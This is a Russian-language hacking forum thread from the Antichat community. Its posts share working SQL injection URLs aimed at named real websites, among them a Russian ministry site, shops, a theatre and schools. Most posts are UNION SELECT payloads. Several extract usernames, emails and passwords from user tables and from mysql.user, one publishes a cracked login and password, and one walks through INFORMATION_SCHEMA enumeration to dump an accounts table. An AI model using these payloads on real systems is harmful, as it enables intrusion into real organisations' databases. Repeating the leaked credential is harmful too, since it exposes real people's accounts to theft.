23.03.2007, 13:41
|
|
Banned
Регистрация: 10.10.2006
Сообщений: 596
Провел на форуме:
2132613
Репутация:
1365
|
|
МИНИСТЕРСТВО ИНФОРМАЦИОННЫХ ТЕХНОЛОГИЙ И СВЯЗИ РОССИЙСКОЙ Федерации
Код:
http://english.minsvyaz.ru/news.shtml?id=-1+UNION+SELECT+VERSION()/*&news_id=36
|
|
|
23.03.2007, 14:27
|
|
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503
Репутация:
5826
|
|
Код:
http://valiza.com.ua/opinions.php?id=-1+union+select+1,2,concat(username,char(58),email,char(58),password),4,5,6,7+from+phorum_users/*
|
|
|
|
23.03.2007, 14:41
|
|
Познающий
Регистрация: 05.02.2007
Сообщений: 71
Провел на форуме:
423288
Репутация:
82
|
|
http://forum.filippoff.ru/theme.php?id=-58+union+select+1,2,concat(login,char(58)pass),4,5 ,6,7,8,910,11,12+from+users+limit+0,1/*
Пасс в чистом виде=)
roman:331133
http://filippoff.ru/page.php?id=-12+union+select+1,concat(login,char(58),pass),3+fr om+user/*
http://www.montech.ru/index.php?id=-2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
http://www.fischer-fix.ru/index.php?id=-127+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
http://www.lightpro.ru/news/detail.php?id_news=-3
http://www.chelkomp.ru/description.php?id=00000000046&grp=-1
Последний раз редактировалось Snap; 23.03.2007 в 15:52..
|
|
|
|
23.03.2007, 16:26
|
|
Участник форума
Регистрация: 14.01.2006
Сообщений: 242
Провел на форуме:
2630617
Репутация:
245
|
|
Код:
http://www.jgts.net/post.php?id=-477+ORDER+BY+10/*
|
|
|
|
23.03.2007, 17:44
|
|
Участник форума
Регистрация: 12.10.2006
Сообщений: 158
Провел на форуме:
668286
Репутация:
187
|
|
http://www.barcode.shark.ru/page.php?id=180%20union%20select%201,2,password,4, 5,6,7,8,9,10%20from%20mysql.user/*
http://ventorg.ru/index.php?id=180%20union%20select%201/*
http://tuz-by.com/viewperson.php?id=180%20union%20select%201,2,3,4,5 ,6,7,8,9,10/*
|
|
|
|
23.03.2007, 18:08
|
|
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503
Репутация:
5826
|
|
Вывод в title'е:
Код:
http://www.rosmed.ru/news.php?act=by_id&news_id=-1+union+select+convert(concat(comp_domain,char(58),comp_user_fio,char(58),comp_user_mail,char(58),comp_user_pass,char(58),comp_addr_phone),char),2+from+comp/*
|
|
|
|
23.03.2007, 18:08
|
|
Участник форума
Регистрация: 13.01.2007
Сообщений: 160
Провел на форуме:
865816
Репутация:
181
|
|
Код:
http://english.dvb.no/news.php?id=-1+union+select+1,version(),3,4,5,6,7,8,9,10/*
|
|
|
|
06.07.2008, 00:50
|
|
Banned
Регистрация: 19.10.2007
Сообщений: 152
Провел на форуме:
557623
Репутация:
415
|
|
Белорусский Республиканский ТЕАТР ЮНОГО ЗРИТЕЛЯ
Сообщение от kair
http://tuz-by.com/viewperson.php?id=180%20union%20select%201,2,3,4,5 ,6,7,8,9,10/*
При инъекции в скрипте persons.php можно узнать немного больше
Код:
http://www.tuz-by.com/persons.php?type=1+union+select+1,2,version(),user(),5,6,7,8,database(),10--
VERSION(): 4.0.24_Debian-10sarge2-log
DATABASE(): tuzbycom
USER(): tuzbycom@localhost
Так же подвержен скуль-инъекции скрипт
Код:
http://www.tuz-by.com/viewpress.php?id=13+union+select+1,2,3,4,5,6,7--
|
|
|
|
23.03.2007, 18:20
|
|
Участник форума
Регистрация: 13.03.2007
Сообщений: 120
Провел на форуме:
1604641
Репутация:
590
|
|
www.tal-shop.se
Код:
http://www.tal-shop.se/index.php?id=5&cid=-38+union+select+concat(passwd,0x3a,id_user,0x3a)+from+users/*
Код:
http://www.spinter.net/page.php?id=-22+union+select+version(),user()/*
Код:
http://www.gmstz.edu.ba/vijesti.php?id=-64+union+select+1,database(),3,4,5/*
|
|
|
|
23.03.2007, 18:26
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869
Репутация:
3033
|
|
Даже char() не потребовался, как знали =))
Код:
http://www.gostudy.com.ua/news.phtml?id=-40+union+select+1,2,user(),database(),version(),6,7,8,9+from+users/*
Это ответ недавнему "великому" взлому удава... 3 действия)
Код:
http://www.www.account.spb.ru/?Cat=regadms&Mod=view&ID=-2+union+select+1,2,3,4,5,6,TABLE_NAME,8,9,10,11,12,13,14+from+INFORMATION_SCHEMA.TABLES/*
http://www.www.account.spb.ru/?Cat=regadms&Mod=view&ID=-2+union+select+1,2,3,4,5,6,COLUMN_NAME,8,9,10,11,12,13,14+from+INFORMATION_SCHEMA.COLUMNS/*
http://www.www.account.spb.ru/?Cat=regadms&Mod=view&ID=-2+union+select+1,2,3,4,5,id,concat_ws(char(58),FIO,Login,PasWD),8,9,10,11,12,13,14+from+accounts/*
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
